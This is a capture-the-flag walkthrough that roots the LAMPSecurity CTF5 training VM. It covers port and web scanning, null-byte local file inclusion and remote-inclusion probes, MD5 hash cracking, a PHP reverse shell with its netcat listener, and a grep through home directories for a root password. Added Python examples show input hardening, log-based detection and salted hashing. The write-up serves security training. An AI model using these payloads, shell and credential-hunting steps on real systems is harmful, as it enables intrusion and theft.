Source Information

Author: madirish2600
Series: LAMPSecurity
Download: download.vulnhub.com/lampsecurity/ctf5.zip

“The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products. Please note there are other capture the flag exercises (not just the latest one). Check the SourceForge site to find other exercises available here.”


Getting Started

As always, remember that it’s recommended to use walkthroughs as a “booster” to your own work when attempting to own vulnerable applications.
“For the things we have to learn before we can do them, we learn by doing them.” –Aristotle

To kick things off, we’ll use arp-scan to ARP out across our local network and identify that the CTF5 box has leased the IP address 10.0.88.7.

calvinbebop@Dolos:~$ arp-scan -l | grep 10.
Interface: eth0, datalink type: EN10MB (Ethernet)
10.0.88.1	52:54:00:12:35:00	QEMU
10.0.88.3	08:00:27:e7:ed:99	CADMUS COMPUTER SYSTEMS
10.0.88.2	52:54:00:12:35:00	QEMU
10.0.88.7	08:00:27:6c:b1:92	CADMUS COMPUTER SYSTEMS

Initial Service Enumeration

Now we’ll set up Nmap to run a full TCP SYN scan of 10.0.88.7 and hopefully discover potential attack vectors in the system. A complete description of the tool’s flag usage can be found here. As usual, we’ll use the following flags:

Flag  Description
-sS   Utilize a TCP SYN scan
-sV   Probe open ports to determine service/version info
-sC   Run the default set of service scripts
-A    Enable OS detection, version detection, script scanning, and traceroute
-p-   Target all TCP ports from 1-65535

calvinbebop@Dolos:~$ sudo nmap -sS -sV -sC -A -p- 10.0.88.6
sudo nmap -sS -sV -sC -A -p- 10.0.88.7
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-02 11:29 CST
Nmap scan report for 10.0.88.7
Host is up (0.00062s latency).
Not shown: 65524 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.7 (protocol 2.0)
| ssh-hostkey: 
|   1024 05:c3:aa:15:2b:57:c7:f4:2b:d3:41:1c:74:76:cd:3d (DSA)
|_  2048 43:fa:3c:08:ab:e7:8b:39:c3:d6:f3:a4:54:19:fe:a6 (RSA)
25/tcp    open  smtp        Sendmail 8.14.1/8.14.1
| smtp-commands: localhost.localdomain Hello [10.0.88.5], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP, 
|_ 2.0.0 This is sendmail 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 
80/tcp    open  http        Apache httpd 2.2.6 ((Fedora))
|_http-server-header: Apache/2.2.6 (Fedora)
|_http-title: Phake Organization
110/tcp   open  pop3        ipop3d 2006k.101
|_pop3-capabilities: STLS TOP UIDL USER LOGIN-DELAY(180)
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-04-29T11:31:53
|_Not valid after:  2010-04-29T11:31:53
|_ssl-date: 2018-12-02T17:30:03+00:00; 0s from scanner time.
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
143/tcp   open  imap        University of Washington IMAP imapd 2006k.396 (time zone: -0500)
|_imap-capabilities: MULTIAPPEND NAMESPACE SASL-IR UNSELECT SCAN LOGIN-REFERRALS IDLE IMAP4REV1 STARTTLSA0001 BINARY ESEARCH completed CHILDREN CAPABILITY WITHIN THREAD=REFERENCES THREAD=ORDEREDSUBJECT LITERAL+ UIDPLUS SORT MAILBOX-REFERRALS OK
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-04-29T11:31:53
|_Not valid after:  2010-04-29T11:31:53
|_ssl-date: 2018-12-02T17:30:04+00:00; 0s from scanner time.
445/tcp   open  netbios-ssn Samba smbd 3.0.26a-6.fc8 (workgroup: MYGROUP)
| mysql-info: 
|   Protocol: 10
|   Version: 5.0.45
|   Thread ID: 3
|   Capabilities flags: 41516
|   Some Capabilities: ConnectWithDatabase, SupportsTransactions, Speaks41ProtocolNew, LongColumnFlag, Support41Auth, SupportsCompression
|   Status: Autocommit
|_  Salt: BtB/_sE>H.JjY\D|egUR
37048/tcp open  status      1 (RPC #100024)
MAC Address: 08:00:27:6C:B1:92 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
Service Info: Hosts: localhost.localdomain, 10.0.88.7; OS: Unix

Host script results:
|_clock-skew: mean: 1h15m00s, deviation: 2h30m01s, median: 0s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.26a-6.fc8)
|   Computer name: localhost
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: localhost.localdomain
|_  System time: 2018-12-02T12:30:03-05:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.62 ms 10.0.88.7

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.21 seconds

HTTP (80/TCP) Enumeration (Scanning)

Although there were a number of other services available, I personally like to find my first foothold via a machine’s web application. We’ll now go ahead and kick off a nikto scan of the web server in the background while we conduct a manual investigation of the site.

calvinbebop@Dolos:~$ nikto -h http://10.0.88.7
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.88.7
+ Target Hostname:    10.0.88.7
+ Target Port:        80
+ Start Time:         2018-12-02 11:39:21 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.6 (Fedora)
+ Retrieved x-powered-by header: PHP/5.2.4
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.6 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /index.php?page=../../../../../../../../../../etc/passwd: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=../../../../../../../../../../boot.ini: PHP include error may indicate local or remote file inclusion is possible.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Server leaks inodes via ETags, header found with file /phpmyadmin/ChangeLog, inode: 558008, size: 22676, mtime: Mon Aug 20 21:59:12 2029
+ OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Cookie SQMSESSID created without the httponly flag
+ OSVDB-3093: /mail/src/read_body.php: SquirrelMail found
+ OSVDB-3093: /squirrelmail/src/read_body.php: SquirrelMail found
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /index.php?module=PostWrap&page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?%00: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt??: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page[path]=http://cirt.net/rfiinc.txt??&cmd=ls: PHP include error may indicate local or remote file inclusion is possible.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 8345 requests: 0 error(s) and 32 item(s) reported on remote host
+ End Time:           2018-12-02 11:39:36 (GMT-6) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

HTTP (80/TCP) Manual Investigation

Welcome to CTF5’s homepage, Phake Organization.

Clicking into the next section of the site, we see a new parameter, page, was used to specify the request for the About Us page.

In the spirit of breaking things, let’s add an apostrophe to the end of page’s value and see what gets returned. Looks like the server isn’t correctly sanitizing input to the include_once function.


Local File Inclusion Vulnerability

Let’s try a few different file inclusion tests and see if we can’t get this function to return files from the local file system. If we’re even luckier, we may be able to have it retrieve files from a remote server. It looks like the server is appending a .php file extension to our parameter’s value though.

An easy workaround is to append a null byte to the parameter’s value. The null byte is a string-terminating character, which means everything after it is ignored, including that pesky .php file extension. And just like that, we have a working local file inclusion vulnerability!
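To see what the fix looks like from the developer’s side, here is an added Python example (my own code, not anything from CTF5 or the LAMPSecurity project) that models the include behaviour described above next to a hardened resolver. The document root /srv/ctf5/pages and the allowlist of page names are assumptions standing in for the real site; the weak function exists only for comparison, and safe_resolve shows the three checks that close the hole: a strict token check on the parameter, an allowlist of known pages, and a realpath containment check.

```python
import os
import re
from typing import Optional
from urllib.parse import unquote

# Constructed allowlist standing in for the pages the site really ships
# (an assumption; the real page set is not part of the original post).
ALLOWED_PAGES = {"home", "about", "blog", "contact"}

# A page name is a short token: no slashes, dots, colons or control bytes.
PAGE_TOKEN = re.compile(r"[a-z0-9_-]{1,32}")


def vulnerable_resolve(raw_page: str, base_dir: str) -> str:
    """Model of the behaviour the post describes: trust the parameter,
    append '.php', and let a NUL byte silently cut the name short (as the
    C string functions under older PHP did). Kept only for comparison."""
    page = unquote(raw_page)            # %00 becomes a real NUL byte here
    name = (page + ".php").split("\x00", 1)[0]
    return os.path.normpath(os.path.join(base_dir, name))


def safe_resolve(raw_page: str, base_dir: str) -> Optional[str]:
    """Hardened resolver: returns the file to include, or None to refuse."""
    page = unquote(raw_page)
    # 1. Shape check first: rejects '../', NUL, 'http://', 'php://' and
    #    everything else that is not a plain page token.
    if not PAGE_TOKEN.fullmatch(page):
        return None
    # 2. Only pages the application knows about may be included.
    if page not in ALLOWED_PAGES:
        return None
    # 3. Defence in depth: the resolved path must stay under base_dir
    #    even if the regex or allowlist is loosened later.
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, page + ".php"))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    base = "/srv/ctf5/pages"            # constructed document root
    probes = ("about", "../../../../etc/passwd%00", "http://cirt.net/rfiinc.txt%3F")
    for probe in probes:
        print(f"{probe!r:42} weak -> {vulnerable_resolve(probe, base)}")
        print(f"{'':42} safe -> {safe_resolve(probe, base)}")
```

The order of the checks matters: the token check runs before anything touches the filesystem, so a request carrying %00 or a scheme never reaches a path operation at all, and the containment check is there for the day someone relaxes the regex.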

fimap is a useful tool which can help find and exploit local and remote file inclusion bugs in webapps. Since we’ve already identified a working LFI vulnerability, let’s point fimap at it and see what gets returned.

calvinbebop@Dolos:~$ fimap -u 'http://10.0.88.7?page=about'
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

SingleScan is testing URL: 'http://10.0.88.7?page=about'
[19:27:54] [OUT] Inspecting URL 'http://10.0.88.7?page=about'...
[19:27:54] [INFO] Fiddling around with URL...
[19:27:54] [OUT] [PHP] Possible file inclusion found! -> 'http://10.0.88.7?page=yfJtdbai' with Parameter 'page'.
[19:27:54] [OUT] [PHP] Identifying Vulnerability 'http://10.0.88.7?page=about' with Parameter 'page'...
[19:27:54] [INFO] Scriptpath received: '/var/www/html'
[19:27:54] [INFO] Operating System is 'Unix-Like'.
[19:27:54] [INFO] Trying NULL-Byte Poisoning to get rid of the suffix...
[19:27:54] [INFO] NULL-Byte Poisoning successfull!
[19:27:54] [INFO] Testing file '/etc/passwd'...
[19:27:54] [INFO] Testing file '/proc/self/environ'...
[19:27:54] [INFO] Skipping absolute file 'php://input'.
[19:27:54] [INFO] Testing file '/var/log/apache2/access.log'...
[19:27:54] [INFO] Testing file '/var/log/apache/access.log'...
[19:27:54] [INFO] Testing file '/var/log/httpd/access.log'...
[19:27:54] [INFO] Testing file '/var/log/apache2/access_log'...
[19:27:54] [INFO] Testing file '/var/log/apache/access_log'...
[19:27:54] [INFO] Testing file '/var/log/httpd/access_log'...
[19:27:54] [INFO] Testing file '/apache/logs/access.log'...
[19:27:54] [INFO] Testing file '/apache/logs/access_log'...
[19:27:54] [INFO] Testing file '/apache2/logs/access.log'...
[19:27:54] [INFO] Testing file '/apache2/logs/access_log'...
[19:27:54] [INFO] Testing file '/etc/httpd/logs/access_log'...
[19:27:54] [INFO] Testing file '/etc/httpd/logs/access.log'...
[19:27:54] [INFO] Testing file '/var/httpd/logs/access_log'...
[19:27:54] [INFO] Testing file '/var/httpd/logs/access.log'...
[19:27:54] [INFO] Testing file '/var/www/logs/access_log'...
[19:27:54] [INFO] Testing file '/var/www/logs/access.log'...
[19:27:54] [INFO] Testing file '/usr/local/apache/logs/access_log'...
[19:27:54] [INFO] Testing file '/usr/local/apache/logs/access.log'...
[19:27:54] [INFO] Testing file '/usr/local/apache2/logs/access_log'...
[19:27:54] [INFO] Testing file '/usr/local/apache2/logs/access.log'...
[19:27:54] [INFO] Testing file '/var/log/access_log'...
[19:27:54] [INFO] Testing file '/var/log/access.log'...
[19:27:54] [INFO] Testing file '/logs/access.log'...
[19:27:54] [INFO] Testing file '/logs/access_log'...
[19:27:54] [INFO] Testing file '/opt/lampp/logs/access_log'...
[19:27:54] [INFO] Testing file '/opt/lampp/logs/access.log'...
[19:27:54] [INFO] Testing file '/opt/xampp/logs/access.log'...
[19:27:54] [INFO] Testing file '/opt/xampp/logs/access_log'...
[19:27:54] [INFO] Testing file '/var/log/auth.log'...
[19:27:54] [INFO] Testing file '/var/log/secure'...
[19:27:54] [INFO] Skipping remote file 'http://www.tha-imax.de/fimap_testfiles/test'.
######################################################################
#[1] Possible PHP-File Inclusion                                     #
######################################################################
#::REQUEST                                                           #
#  [URL]        http://10.0.88.7?page=about                          #
#  [HEAD SENT]                                                       #
#::VULN INFO                                                         #
#  [GET PARAM]  page                                                 #
#  [PATH]       /var/www/html                                        #
#  [OS]         Unix                                                 #
#  [TYPE]       Relative with appendix '.php'                        #
#  [TRUNCATION] Works with 'Null-Byte'. :)                           #
#  [READABLE FILES]                                                  #
#                   [0] /etc/passwd -> /../../../../etc/passwd%00    #
######################################################################

fimap was able to find the same LFI vulnerability we identified manually; however, the only file it was able to read was the same /etc/passwd we retrieved previously. Now that we have a verified way to retrieve files from the server, let’s look elsewhere and try to find a vulnerability that might allow file uploads.
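For the defender’s side of the same story, here is an added Python example (my own code, not part of the original post or of nikto/fimap) that runs over a handful of constructed Apache access-log lines modelled on the probes shown in the nikto and fimap output above and flags the ones a SOC would want to see: directory traversal, %00 truncation, remote or stream-wrapper URLs in a query parameter, and direct fetches of /data/pagesdata.txt and /info.php. The log lines, timestamps, client address and user agents are all constructed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache combined log format, enough of it to pull out client, request and status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)
# Stream wrappers and remote schemes that have no business in a page parameter.
INCLUDE_SCHEME = re.compile(r"^(?:https?|ftp|php|data|expect|file|phar)://?", re.I)
# Files the post shows being fetched directly and that should never be public.
SENSITIVE_PATHS = {"/data/pagesdata.txt", "/info.php"}

# Constructed access-log lines modelled on the nikto and fimap probes in the post.
SAMPLE_LOG = """\
10.0.88.5 - - [02/Dec/2018:11:39:21 -0600] "GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1" 200 1532 "-" "scanner (constructed)"
10.0.88.5 - - [02/Dec/2018:11:39:22 -0600] "GET /index.php?page=http://cirt.net/rfiinc.txt? HTTP/1.1" 200 412 "-" "scanner (constructed)"
10.0.88.5 - - [02/Dec/2018:19:27:54 -0600] "GET /?page=/../../../../etc/passwd%00 HTTP/1.1" 200 2210 "-" "scanner (constructed)"
10.0.88.5 - - [02/Dec/2018:11:40:01 -0600] "GET /index.php?page=about HTTP/1.1" 200 3012 "-" "Mozilla/5.0 (constructed)"
10.0.88.5 - - [02/Dec/2018:11:40:02 -0600] "GET /data/pagesdata.txt HTTP/1.1" 200 891 "-" "Mozilla/5.0 (constructed)"
"""


def classify_value(value: str) -> set:
    """Reasons a single (already URL-decoded) query value looks like an inclusion probe."""
    reasons = set()
    if "\x00" in value:
        reasons.add("null-byte")
    if "../" in value or "..\\" in value:
        reasons.add("traversal")
    if INCLUDE_SCHEME.match(value):
        reasons.add("remote-or-wrapper")
    return reasons


def inspect_request(target: str) -> set:
    """Reasons a request target (path + query) should be flagged."""
    parts = urlsplit(target)
    reasons = set()
    if parts.path in SENSITIVE_PATHS:
        reasons.add("sensitive-path")
    # parse_qsl URL-decodes the values, so %00 arrives here as a real NUL byte.
    for _name, value in parse_qsl(parts.query, keep_blank_values=True):
        reasons |= classify_value(value)
    return reasons


def scan_log(text: str) -> list:
    """Return one finding per suspicious line: (client ip, target, status, reasons)."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        reasons = inspect_request(m["target"])
        if reasons:
            findings.append((m["ip"], m["target"], int(m["status"]), sorted(reasons)))
    return findings


if __name__ == "__main__":
    for ip, target, status, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {', '.join(reasons):24} {target}")
```

Note that the status code is carried along on purpose: a 200 on a traversal or null-byte request is the signal that the probe actually worked, which is what separates a noisy scan from a confirmed exposure.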



HTTP (80/TCP) Manual Investigation

Next up to bat is the Blog section of the site. Right away, we can spot a couple of interesting pieces of information. First, we can see the primary user (and probable webmaster) of the site is someone named Andy Carp. It’s typically a good idea to keep track of user information as we work through different boxes since it may come in handy when it’s time to attempt a brute force attack against a service or application. We can also spot a tidbit at the bottom of the page stating that the server is utilizing NanoCMS, which may come in handy. Finally, there’s a direct link to an Admin Login.


NanoCMS Exploitation

Utilizing a disclosed vulnerability within NanoCMS, we’re able to make a request for /data/pagesdata.txt, which returns a semicolon-separated list of variables stored in plain text, one of which is the hashed password for our admin user! A full writeup for this vulnerability can be found at madirish2600’s blog here.


Hash Identification/Cracking

Using hash-identifier, we are able to determine this is an MD5 hashed password.

calvinbebop@Dolos:~$ hash-identifier 
   #########################################################################
   #	 __  __ 		    		__		 	 ______    _____	       #
   #	/\ \/\ \		   		   /\ \ 		/\__  _\  /\  _ `\	       #
   #	\ \ \_\ \     __      ____ \ \ \___		\/_/\ \/  \ \ \/\ \	       #
   #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
   #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
   #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
   #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #								 By Zion3R 							   #
   #							www.Blackploit.com 						   #
   #						       Root@Blackploit.com  				   #
   #########################################################################

   -------------------------------------------------------------------------
 HASH: 9d2f75377ac0ab991d40c91fd27e52fd

Possible Hashs:
[+]  MD5
[+]  Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

As we’ve seen before, MD5 hashes are relatively easy to crack and numerous online sources are happy to provide the “decrypted” strings for provided hashes. Looks like our admin password of the day is shannon. Now let’s go see what trouble we can get into with this account.
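Why the crack is so easy, and what the CMS should have stored instead, as an added Python example (my own code, not from the post or from NanoCMS): the first function is the same dictionary lookup the online services perform against an unsalted MD5, and the other two store and verify a password with a random per-user salt and PBKDF2-HMAC-SHA256, which makes precomputed lookup tables useless and each guess expensive. The wordlist is constructed; the hash constant is the one shown in the hash-identifier output above.

```python
import hashlib
import hmac
import os

# Constructed stand-in for a cracking dictionary; the value the post recovered
# is included only so the walkthrough's result can be reproduced locally.
WORDLIST = ["password", "123456", "letmein", "qwerty", "shannon"]
# Hash as shown in the post's hash-identifier output.
POST_HASH = "9d2f75377ac0ab991d40c91fd27e52fd"


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def crack_unsalted_md5(target_hex: str, wordlist) -> "str | None":
    """Dictionary attack against an unsalted MD5: one fast hash per candidate,
    no salt to vary, and every user sharing the password falls at once."""
    target = target_hex.lower()
    for word in wordlist:
        if md5_hex(word) == target:
            return word
    return None


def hash_password(password: str, salt: bytes = None, iterations: int = 600_000) -> str:
    """What the CMS should have stored: a per-user random salt and a slow KDF,
    serialised as algo$iterations$salt$digest so it can be verified later."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(iterations))
    # Constant-time comparison so the check itself leaks nothing about the digest.
    return hmac.compare_digest(candidate.hex(), digest_hex)


if __name__ == "__main__":
    print("post hash cracks to:", crack_unsalted_md5(POST_HASH, WORDLIST))
    record = hash_password("shannon")
    print("salted record:", record)
    print("verify ok:", verify_password("shannon", record))
    # The same wordlist is useless against the salted record: there is no
    # precomputed table to look it up in, and each guess costs 600k iterations.
```

Two records for the same password will never match because the salt differs, which is exactly why an online “decryption” service has nothing to offer against them.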



PHP Reverse WebShell

Using the admin password we’ve just discovered, we’re able to gain access to the Admin portal. Since the admin portal also allows for us to create new pages entirely, I motion that we create a new PHP web page that when retrieved will generate a reverse webshell back to our own machine.

And now, let’s GET the page

SUCCESS!

calvinbebop@Dolos:~$ nc -nvlp 9898
listening on [any] 9898 ...
connect to [10.0.88.5] from (UNKNOWN) [10.0.88.7] 49998
Linux localhost.localdomain 2.6.23.1-42.fc8 #1 SMP Tue Oct 30 13:55:12 EDT 2007 i686 i686 i386 GNU/Linux
 15:47:51 up  3:45,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
sh: no job control in this shell
sh-3.2$

Local Host Enumeration

Getting our bearings, it looks like we’ve gained access to the apache web-server user account.

sh-3.2$ whoami
apache
sh-3.2$ id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
sh-3.2$

Let’s start by taking a look into some of the different users’ home folders on the server.

sh-3.2$ ls -lsa /home/
total 56
8 drwxr-xr-x  7 root     root     4096 Apr 28  2009 .
8 drwxr-xr-x 23 root     root     4096 Dec  2 12:02 ..
8 drwxrwxr-x  3 amy      amy      4096 Dec  5  2012 amy
8 drwxrwxr-x 24 andy     andy     4096 Apr 29  2009 andy
8 drwxrwxr-x 23 jennifer jennifer 4096 Apr 29  2009 jennifer
8 drwxrwxr-x 23 loren    loren    4096 Apr 29  2009 loren
8 drwxrwxr-x 25 patrick  patrick  4096 Dec  5  2012 patrick

Lucky for us, our good friend Patrick decided to record the root password (50$cent) inside a Tomboy note at /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note.

sh-3.2$ cat 481bca0d-7206-45dd-a459-a72ea1131329.note
<?xml version="1.0" encoding="utf-8"?>
<note version="0.2" xmlns:link="http://beatniksoftware.com/tomboy/link" xmlns:size="http://beatniksoftware.com/tomboy/size" xmlns="http://beatniksoftware.com/tomboy">
  <title>Root password</title>
  <text xml:space="preserve"><note-content version="0.1">Root password

Root password

50$cent</note-content></text>
  <last-change-date>2012-12-05T07:24:52.7364970-05:00</last-change-date>
  <create-date>2012-12-05T07:24:34.3731780-05:00</create-date>
  <cursor-position>15</cursor-position>
  <width>450</width>
  <height>360</height>
  <x>0</x>
  <y>0</y>
  <open-on-startup>False</open-on-startup>
</note>

Although it was certainly feasible to search through the home folders manually on this box, it may be worth saving yourself a bit of time by using a local enumeration script or the power of grep.

sh-3.2$ grep -R password /home/ | grep -v "Permission denied"
...shortened for brevity
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:  <title>Root password</title>
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:  <text xml:space="preserve"><note-content version="0.1">Root password
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:Root password
/home/patrick/.tomboy.log:12/5/2012 7:24:46 AM [DEBUG]: Renaming note from New Note 3 to Root password
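Since the hit was a Tomboy note, here is an added Python example (my own code, not part of the post) that parses Tomboy’s .note XML properly instead of grepping it, flags notes whose title or body mention credentials, and reports only the matched words so the report does not become a second copy of the secret. The root-password note is the one shown above, trimmed to the relevant elements; the second note and both inventory paths below it are constructed.

```python
import re
import xml.etree.ElementTree as ET

TOMBOY_NS = "http://beatniksoftware.com/tomboy"
CREDENTIAL_WORDS = re.compile(
    r"\b(password|passwd|passphrase|pwd|secret|credential|api[ _-]?key)\b", re.I)

# The note from the post, trimmed to the elements that matter for the check.
ROOT_NOTE = """<?xml version="1.0" encoding="utf-8"?>
<note version="0.2" xmlns:link="http://beatniksoftware.com/tomboy/link" xmlns:size="http://beatniksoftware.com/tomboy/size" xmlns="http://beatniksoftware.com/tomboy">
  <title>Root password</title>
  <text xml:space="preserve"><note-content version="0.1">Root password

Root password

50$cent</note-content></text>
  <last-change-date>2012-12-05T07:24:52.7364970-05:00</last-change-date>
</note>
"""

# A constructed harmless note for contrast.
HARMLESS_NOTE = """<?xml version="1.0" encoding="utf-8"?>
<note version="0.2" xmlns="http://beatniksoftware.com/tomboy">
  <title>Shopping</title>
  <text xml:space="preserve"><note-content version="0.1">Shopping

milk, eggs, coffee</note-content></text>
</note>
"""


def parse_note(xml_text: str):
    """Return (title, body) from a Tomboy .note file. Tomboy repeats the
    title as the first line of the body, so the body is the full text."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    title = root.findtext(f"{{{TOMBOY_NS}}}title", default="")
    content = root.find(f"{{{TOMBOY_NS}}}text/{{{TOMBOY_NS}}}note-content")
    body = "".join(content.itertext()) if content is not None else ""
    return title, body


def inspect_note(xml_text: str) -> dict:
    """Flag a note whose title or body talks about credentials; return the
    matched words but never the surrounding text."""
    title, body = parse_note(xml_text)
    hits = {m.group(1).lower() for m in CREDENTIAL_WORDS.finditer(title + "\n" + body)}
    return {"title": title, "flagged": bool(hits), "matched": sorted(hits),
            "lines": body.count("\n") + 1}


def sweep(notes: dict) -> list:
    """notes: mapping of path -> note XML. Returns the paths worth a look."""
    return [path for path, xml_text in notes.items() if inspect_note(xml_text)["flagged"]]


if __name__ == "__main__":
    inventory = {  # constructed inventory; the first path is the one from the post
        "/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note": ROOT_NOTE,
        "/home/amy/.tomboy/constructed-example.note": HARMLESS_NOTE,
    }
    for path in sweep(inventory):
        print("credential-like note:", path, inspect_note(inventory[path])["matched"])
```

In a real sweep the inventory would come from walking each home directory for .tomboy/*.note files; parsing the XML rather than grepping means the check sees the note body even when the keyword sits in the title alone, and the output stays safe to paste into a ticket.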

Rooted - SSH Login (22/TCP)

Now all that’s left to do is verify the root login works with the password we found.

calvinbebop@Dolos:~$ ssh root@10.0.88.7
root@10.0.88.7's password: _50$cent_
Last login: Tue Aug 12 15:17:41 2014
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
[root@localhost ~]#

EOL

Thanks for reading and I hope you were able to learn something new! As usual, there are multiple solutions to rooting this box so feel free to take a different approach.
As always, if you have any questions, corrections, or comments, please feel free to reach out to me on Twitter and have yourself an excellent day!